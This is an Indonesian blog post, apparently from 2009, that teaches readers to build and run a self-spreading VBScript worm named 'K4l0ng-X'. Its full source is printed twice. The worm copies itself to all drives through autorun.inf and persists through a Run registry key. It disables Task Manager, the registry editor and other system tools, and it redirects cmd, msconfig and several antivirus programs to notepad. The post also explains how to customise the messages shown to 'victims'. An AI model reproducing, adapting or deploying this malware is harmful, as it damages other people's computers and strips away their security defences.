Baca ya,
Pada zaman dahulu, hidup lah seorang Hacker...., Eeeeeh keliru!!! Ko' bisa nyasar ke Hacker ya.....??
Gini lho critanya, waktu itu Saya masih baru belajar membuat Virus Worm, dan melakukan pencarian artikel tentang Virus di "Om Google", dan Saya mendapatkan artikel yang isinya script virus worm yang namanya "Kalong_X", tapi Saya sudah lupa dapetnya dimana ya?? Ah, gak penting dapet dimana tak terusin critanya ya...., trus tak seberapa lama Windows Saya terkena virus worm, namanya "Four2One", setelah Saya teliti ternyata Script kedua Virus tersebut mirip abiz!!! Bedanya tipizzzz.....
Trus Saya coba memodifikasinya sedikit aja, gak pake banyak!!!
Maka jadilah Virus K4l0ng-X.
Lha sekarang masuk ke pembicaraan inti, jika kalian ingin mencoba Virus "K4l0ng-X" yang sudah teredit oleh Saya maka ikuti langkah-langkah ini :
(Awas!!! Jika Windows kalian terkena virus ini kalian tanggung sendiri yo...., Siapkan anti virus!!! Lebih aman pake Deep Freez aja biar ces-pleng!!!, tapi tenang aja karena Virus ini tidak terlalu berbahaya dan masih tergolong Virus Low!!!)
1.Virus ini tidak memerlukan Software khusus, cukup Notepad atau Wordpad atau program penyunting text lainnya.
2. Buka Program Notepad! bisa dibuka di "Start > All Programs > Accessories > Notepad"
3. Salin Script dibawah :
on error resume next
dim rute,windows,sadis,an,dree,isi,ony,k4l0ng_X,nitro,check,sido
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0ng-X.dll.vbs"
set an = createobject("Scripting.FileSystemObject")
set dree = an.getfile(Wscript.ScriptFullname)
dim text,size
size = dree.size
check = dree.drive.drivetype
set text = dree.openastextstream(1,-2)
do while not text.atendofstream
rute = rute & text.readline
rute = rute & vbcrlf
loop
do
Set windows = an.getspecialfolder(0)
Set windows = an.getspecialfolder(1)
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
set ony = an.createtextfile(windows & "\k4l0ng-X.dll.vbs",2,true)
ony.write rute
ony.close
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
for each sadis in an.drives
If (sadis.drivetype = 1 or sadis.drivetype = 2) and sadis.path <> "A:" then
set ony=an.getfile(sadis.path &"\k4l0ng-X32.dll.vbs")
ony.attributes =39
set ony=an.createtextfile(sadis.path &"\k4l0ng-X32.dll.vbs",2,true)
ony.write rute
ony.close
set ony=an.getfile(sadis.path &"\k4l0ng-Xt32.dll.vbs")
ony.attributes = 39
set ony =an.getfile(sadis.path &"\autorun.inf")
ony.attributes = 39
set ony=an.createtextfile(sadis.path &"\autorun.inf",2,true)
ony.write isi
ony.close
set ony = an.getfile(sadis.path &"\autorun.inf")
ony.attributes=39
end if
next
set k4l0ng_X = createobject("WScript.Shell")
set k4l0ng_X = createobject("WScript.Shell")
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE","%SystemRoot%\system32\sstext3d.scr"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut","60"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\ThemeFile","%SystemRoot%\resources\Themes\Windows Classic.theme"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\Wallpaper","%SystemRoot%\Web\Wallpaper\Radiance.jpg"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: - K4L0NG-X_Menyerang!!! - ::"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\DisplayString","- K4L0NG-X VIRUZ -"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\FontFace","Colonna MT"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\RotationStyle",3, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0ng-X.dll.vbs"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", ".:K4l0ng-X:."
k4l0ng_X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Komputermu terkena Virus K4L0NG-X!!!"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANSAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger","notepad.exe"
if check <> 1 then
Wscript.sleep 100000
end if
do
loop while check <> 1
set sido = createobject("Wscript.shell")
sido.run windows & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
loop
dim rute,windows,sadis,an,dree,isi,ony,k4l0ng_X,nitro,check,sido
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0ng-X.dll.vbs"
set an = createobject("Scripting.FileSystemObject")
set dree = an.getfile(Wscript.ScriptFullname)
dim text,size
size = dree.size
check = dree.drive.drivetype
set text = dree.openastextstream(1,-2)
do while not text.atendofstream
rute = rute & text.readline
rute = rute & vbcrlf
loop
do
Set windows = an.getspecialfolder(0)
Set windows = an.getspecialfolder(1)
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
set ony = an.createtextfile(windows & "\k4l0ng-X.dll.vbs",2,true)
ony.write rute
ony.close
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
for each sadis in an.drives
If (sadis.drivetype = 1 or sadis.drivetype = 2) and sadis.path <> "A:" then
set ony=an.getfile(sadis.path &"\k4l0ng-X32.dll.vbs")
ony.attributes =39
set ony=an.createtextfile(sadis.path &"\k4l0ng-X32.dll.vbs",2,true)
ony.write rute
ony.close
set ony=an.getfile(sadis.path &"\k4l0ng-Xt32.dll.vbs")
ony.attributes = 39
set ony =an.getfile(sadis.path &"\autorun.inf")
ony.attributes = 39
set ony=an.createtextfile(sadis.path &"\autorun.inf",2,true)
ony.write isi
ony.close
set ony = an.getfile(sadis.path &"\autorun.inf")
ony.attributes=39
end if
next
set k4l0ng_X = createobject("WScript.Shell")
set k4l0ng_X = createobject("WScript.Shell")
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE","%SystemRoot%\system32\sstext3d.scr"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut","60"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\ThemeFile","%SystemRoot%\resources\Themes\Windows Classic.theme"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\Wallpaper","%SystemRoot%\Web\Wallpaper\Radiance.jpg"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: - K4L0NG-X_Menyerang!!! - ::"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\DisplayString","- K4L0NG-X VIRUZ -"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\FontFace","Colonna MT"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\RotationStyle",3, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0ng-X.dll.vbs"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", ".:K4l0ng-X:."
k4l0ng_X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Komputermu terkena Virus K4L0NG-X!!!"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANSAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger","notepad.exe"
if check <> 1 then
Wscript.sleep 100000
end if
do
loop while check <> 1
set sido = createobject("Wscript.shell")
sido.run windows & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
loop
- Kode yang bertuliskan ":: - K4L0NG-X_Menyerang!!! - ::" itu adalah judul window yang aka ditampilkan pada browser IE (Internet Explorer), bisa kalian rubah semau kalian.
- Kode yang bertuliskan "- K4L0NG-X VIRUZ -" adalah tulisan pada Screen Saver, kalo mau dirubah silahkan.
- Kode yang bertuliskan ".:K4l0ng-X:." itu adalah judul jendela konfirmasi sebelum logon ditampilkan, itu juga bisa dirubah.
- Kode yang bertuliskan "Komputermu terkena Virus K4L0NG-X!!!" adalah isi (pesan pembuat) pada jendela konfirmasi sebelum logon ditampilkan, isi pesan-pesan kalian kepada korban.
6. Jalankan file K4l0ng-X.vbs.
Ba!!!, komputer kalian sudah terkena Virus K4l0ng-X, Mungkin dengan segera Anti Virus kalian akan mendeteksi Virus tersebut, tetapi meskipun Virusnya sudah dihapus efeknya akan tetap beraksi. Kalo gak percaya coba buka Command Promt di "Start > All Programs > Accessories > Command Promt" maka akan terbuka "Notepad" dengan isi yang gak karu-karuan!!!
dan masih banyak lagi kejanggalan-kejanggalan yang akan kalian temui pada komputer kalian sebelum efeknya dihilangkan. Jika kalian ingin menghilangkan efek Virus tersebut, silahkan baca Artikel "Membuat K4l0ng-X Removal", disana Saya memberika Script yang bisa menghilangkan efek K4l0ng-X.
Good Luck!!!
1 komentar:
5 Maret 2009 pukul 20.56
bisa ngga biar ngga usah ke notepad tapi malah muncul msgbox???
Posting Komentar